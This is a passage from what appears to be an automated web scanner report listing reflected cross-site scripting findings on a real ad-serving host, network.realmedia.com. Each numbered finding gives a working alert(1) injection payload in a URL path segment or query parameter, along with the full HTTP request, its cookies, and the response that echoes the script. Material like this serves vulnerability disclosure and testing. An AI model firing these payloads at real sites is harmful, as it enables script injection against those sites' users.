GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3453af"><script>alert(1)</script>99c2aff247f?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:19 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/165246727/Bottom3453af"><script>alert(1)</script>99c2aff247f/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.689. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 822c7"-alert(1)-"b8da27ec3b8 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=822c7"-alert(1)-"b8da27ec3b8 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:46:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1R10M5b|R10M5i|R1012Mr|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 580
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:37:19 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "822c7"-alert(1)-"b8da27ec3b8";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.690. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e5f"><script>alert(1)</script>9bbe677cf54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmediad1e5f"><script>alert(1)</script>9bbe677cf54/Retarget_Secure/781946036@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:45 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmediad1e5f"><script>alert(1)</script>9bbe677cf54/Retarget_Secure/228520286/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.691. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c01ee"><script>alert(1)</script>bb4f72e29db was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Securec01ee"><script>alert(1)</script>bb4f72e29db/781946036@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 260
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:51 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Securec01ee"><script>alert(1)</script>bb4f72e29db/L18/843217270/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?843217270" TARGET=_blank>

4.692. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e249f"><script>alert(1)</script>16286ef0491 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3e249f"><script>alert(1)</script>16286ef0491?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 389
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:56 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/629408528/Bottom3e249f"><script>alert(1)</script>16286ef0491/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.693. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9301d"-alert(1)-"d4991227f15 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3?_RM_HTML_MM_=1011550000100005110019301d"-alert(1)-"d4991227f15 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:23 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|R10M5i|O10M5l|R10M5p|R10M5x|R10M62|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 601
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:25 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "1011550000100005110019301d"-alert(1)-"d4991227f15";
var mm247m = "";
if (mm247o.length==21) {
   var i=0;
   while (i<21) {
       mm247m += mmarray[i] + mm247o.charAt(i);
       i=i+1;
   }
}
document.cookie="mm247="+mm247m+";expires="+mm247d.toGMTString()
...[SNIP]...

4.694. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73248"><script>alert(1)</script>4d03b1824f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia73248"><script>alert(1)</script>4d03b1824f5/Retarget_Secure/816963349@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 397
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:40 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia73248"><script>alert(1)</script>4d03b1824f5/Retarget_Secure/292245608/Bottom3/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.695. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5c5f"><script>alert(1)</script>2d1714c1c8d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Securec5c5f"><script>alert(1)</script>2d1714c1c8d/816963349@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 262
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:45 GMT;path=/

<a href="https://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Securec5c5f"><script>alert(1)</script>2d1714c1c8d/L18/1843694711/Bottom3/USNetwork/TRACK_Default/1x1gif.html/726348573830307044726341416f7670?1843694711" TARGET=_blank>

4.696. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e2e9"><script>alert(1)</script>572fba20dfd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom32e2e9"><script>alert(1)</script>572fba20dfd?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 390
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:39:50 GMT;path=/

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/TRACK_Mindsetmedia/Retarget_Secure/1177159324/Bottom32e2e9"><script>alert(1)</script>572fba20dfd/default/empty.gif/726348573830307044726341416f7670?_RM_HTML_MM_=101155000010000511001" target="_top">
...[SNIP]...

4.697. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3 [_RM_HTML_MM_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The value of the _RM_HTML_MM_ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c16f"-alert(1)-"ce5dc795775 was submitted in the _RM_HTML_MM_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3?_RM_HTML_MM_=8c16f"-alert(1)-"ce5dc795775 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:47:31 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|R10M5i|O10M5l|R10M5p|R10M62|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 580
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:38:33 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA","OP","DO","CR","BR","CO","MO","PE","PR","PU","SP","SU","DI","EX","OM","DY","RS");
var mm247o = "8c16f"-alert(1)-"ce5dc795775";
var mm247m = "";
